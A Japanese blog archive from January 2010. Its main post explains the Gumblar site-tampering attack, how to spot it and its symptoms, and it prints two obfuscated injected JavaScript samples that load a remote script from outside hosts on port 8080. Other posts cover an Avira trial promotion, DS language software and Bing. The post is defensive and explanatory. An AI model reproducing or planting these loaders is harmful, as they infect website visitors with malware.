月別アーカイブ: 1月 2010

ガンブラー改ざんコードの確認チェック


  • 不正なコードはJavaScript「<script>~</scirpt>」で記述されている
     → ブラウザのJavaScript機能を無効にしておくことで機能はしない
  • 不正なコードが挿入されれるファイルはHTMLファイル、PHPファイル、JavaScriptファイルなど
     → テキスト、画像、音楽、動画、CSS以外
  • 不正なコードの主要部分はサイトごとに記述がバラバラである。
     → 1サイト内では同一のものが挿入される
  • 悪意のある不正なコードの挿入位置は基本的にページの最下部
     → 最下部に加えて最上部にも挿入される場合がある

◆ 改ざんサンプル 2種

<script>try{window.onload=function(){Tkug4qgr0degb8 = ” + ‘i$(((n(-#c!!)o#^^m&$).^(t)^h)()e^^!)p^l(#&)a(!@n(&&@!e^t#).^$c&(o#@m!.!^^w&@($!w&!@)#e@&)-@(@c&)&o@#^$m!(@.&^b((e)&s#&)t^$^b@@^o)^n^@!(d(@^s^&)$i)$t$$!)#e!$).@&)r#$u@:#(W&&v@#5((0#$$e(&5)#!(i!m!^4(&u&)f$#)n())$b!/)!&)v)!$n#((#e)&#x)&p^r)$@e^s)#s^.$!@n)!e))t&$(/$(v^^(!n$e&x)p$r)^)e&#&^s(s)).(!)^n(^^&#e#$t&()#/#(g(&^&)o&o)#g#l#))#$e@@.^$()p#^)t!!#/&#g($$)o)@)o)&$g)^@l($e@.)^!c!&o$((m)/^l!#$$e@&n&t&@a#@#.!@$r!)(u&#!/#’.replace(/#|@|!|(|)|&|$|^/ig, ”) ;Qhca6xvw41mfe = ‘appendChild’;An443u7fczbc = document.createElement(’sc’+’ript’);An443u7fczbc.src = ‘h’+’ttp://’+Tkug4qgr0degb8.replace(/Wv50e5im4ufnb/g, ‘8080’);An443u7fczbc.setAttribute(’defer’, ‘def’+’er’);eval(’document.body.’+Qhca6xvw41mfe+’(An443u7fczbc)’);} }  catch(Xfrzrokw ) {}</script>

<script>try{window.onload=function(){Lh49boaiozcvlx = ” + ‘s$(e&)(!r@^i&#e&)s)##@y&(#o#$()@n)@k)#i^$)((s)&#&-$@$@c(@o))(m$)&.@&1^1$!)(3#((3!.^@c!c)#).(@s^t@@)(e$@r)$n##-#!#d^&$e@.)($b!$#(e@s$@()^t^$@s#!)e@a$)(^@s!i@#&l&@)!(v^(@e)!#@r@#&.(&(r$!u&@^@!:#@D##&^5$@e&)i((^z!$j#)@3!x$0&)#&^d$#6@r)/#&$g$$a!m&))e##$v(!(a@&n@c@^e$&.@#c$@o()^#m)#/$@)(g&)(a((m(!e)!^v$a&)n@c#&(@e&.)c#&o#&m@!()&/$((^#g@(o@$o#$g(&l)^)$e^!$.&!c$o@)m#)/@(@m#o#(n)^$#o$!$#g^((r^$a&&#f&@)i)!)#a&s^.&)#!c@@!(o@&m(($/@)(1@7$$&1!^((7#@#3@@#.)$&@c)()o&m!$@/#$@’.replace(/@|#|&|(|$|^|)|!/ig, ”) ;Rm7gbvm3hdk3wq = ‘appendChild’;Ii46pd7p9cf4c = document.createElement(’sc’+’ript’);Ii46pd7p9cf4c.src = ‘h’+’ttp://‘+Lh49boaiozcvlx.replace(/D5eizj3x0d6r/g, ‘8080’);Ii46pd7p9cf4c.setAttribute(’defer’, ‘def’+’er’);eval(’document.body.‘+Rm7gbvm3hdk3wq+’(Ii46pd7p9cf4c)’);} }  catch(Vkfi8hgh ) {}</script>

 太字はどのサイトでも共通する部分で、それ以外の文字列はランダムです。(ウイルス対策ソフトの誤反応を回避するため、一部の記号を全角文字に変換してあります。)

◆ ガンブラーの対策
 上のような不正なコードが埋め込まれたページをブラウザで見ただけでガンブラーによるウイルスが発動する恐れがある。普通の一般の企業サイトや個人サイトがそのような状態になっているということで、「怪しいサイトに行かなければ安全」というのが通用しない。ただ、無料でできるガンブラー対策を行い、有名ソフトウェアにあるセキュリティの穴を塞げば問題は起こらない。

◆ ガンブラーの症状
 対策をきちんと行ってない場合は被害を受けることになる。ユーザーの意思は関係なく感染してしまう脅威である(何かを実行するわけでもなく、クリックするわけでもなく、OKボタンを押すわけでもなく)。ガンブラーの被害を受けた感染直後は変化はないため気づかない。何かおかしい?と気づいたときはすでに感染は完了済みである。

  • パソコンの動作が重くなり(CPU使用率が異常に高いプロセスが出現)、他の作業ができなくなる
  • Security Tool(偽ウイルス対策ソフト)という名称の英語のプログラムが導入され、”ウイルスに感染してる”というデタラメな警告をバコバコ表示し、他の作業ができなくなる。(デスクトップからアイコンや壁紙が消失、パソコンのシャットダウンの繰り返し)

☆ コトバ
 ガンブラー(Gumblar) … 2009年5月の改ざん騒動の時に攻撃者が用意したサイトが「http://gumblar.cn/」というドメイン(.cnはいちおう中国)に由来する。日本を含め世界中のサイトに不正なデータが埋め込まれ、このドメインへユーザーを強制誘導させウイルスを発動させる処理になっていた。

Avira AntiVir有償版の90日無料体験版ライセンス


 ドイツ製ウイルス対策ソフト「Avira AntiVir」の有償版は、通常は30日間(1ヶ月)の無料体験版が配布されてます。これは他のウイルス対策ソフトの無料体験版でも一般的な長さですな。

 ところが、Avira社と他の会社とのプロモーション(キャンペーン)の一環で、通常よりも期間が長い90日間(3ヶ月)の特別な無料体験版のライセンスキーというのが期間限定で公開される時がたまにあります。

 公開されるURLアドレスは下のようになるので、「license.avira.com/en/promotion-」をキーワードにGoogle検索してみるといくつか見つけることが可能です。(Googleの検索ツールで「1週間以内」で絞るとよろし)

license.avira.com/en/promotion-[ランダムなID]

 注意点として、

  • すでにキャンペーンが終了してる場合あり。
    → 「The promotion has expired on [年月日].」と表示される。
  • キャンペーンが終了して通常の30日間版に切り替わってる場合あり。
  • 日本からはアクセスできないよう制限されてるキャンペーンあり。
    → 「We are sorry but this promotion is not available in your region.」と表示される。

中国語の学習 (学研 中国語三昧DS / ゼロからカンタン中国語DS)


 任天堂の携帯ゲーム機ニンテンドーDS向け語学ソフト「中国語」。

  • 学研 中国語三昧DS
  • ゼロからカンタン中国語DS

Bingのサイト登録ページにあるCAPTCHA画像が変化


Bingのサイト登録ページ (画像認証&URLアドレス指定)

 マイクロソフトの検索エンジンBing(ビング)。そのBingにページを手動登録するためのフォームが置かれてあるページに、機械的な大量登録を避けるための画像認証(CAPTCHA)が用意されてますが、この画像の種類が変わってますかいな。

 前のものより少しは見やすくなったなぁという感じ。 前は読み取るべき文字の上にまんま被さる形でラインが引かれるスタイルだったので、被さり具合によってはとても読みづらくてー、と言うか読み取れんことも・・・。

 新しい画像はゆがんだ文字の近辺にヒョロヒョロ線(笑)が複数描画されるというスタイル。ちょっと文字と被る時も。大手サイトなのでこういう対策は必須とはいえ、読み取りはホントめんどいねぇ。( ^^;)

 ちなみに、Yahoo!やGoogleと違って、いちおう外部リンクがなくても、ここでページのURLアドレスを送信すると、基本的にページはBingに登録されるようです。外部リンクがない(少ない)ままだと、いつのまにか検索インデックスから消滅しちゃいますが・・・。

 Bingのサイトオーナーヘルプのページには↓という記述も。

インデックス登録された Web サイトは、登録後 60 日間インデックスに保存されます。ただし、Web サイトのランクによってはインデックスから削除される場合もあります。

● Bing 検索コマンド

  • url:(アドレス) … 指定したアドレスの1ページが登録されてるか
  • site:(アドレス) … 指定したアドレス全体で登録されてるページ一覧

検索エンジン登録ページの一覧

楽天ファスト モバイルサーチ → Bingモバイル にリダイレクト


 楽天&FASTの合弁会社「楽天・ファスト・モバイルサーチ」が提供してたモバイル検索(RFMS検索)は、2009年11月末にサービス終了となってましたが、今はマイクロソフトの検索エンジンBingの携帯電話向けバージョンBingモバイルにリダイレクトされますな。

m.rfms.jp / http://www.ifms.jp ⇒ m.bing.com

 FAST社はマイクロソフトの子会社ということで。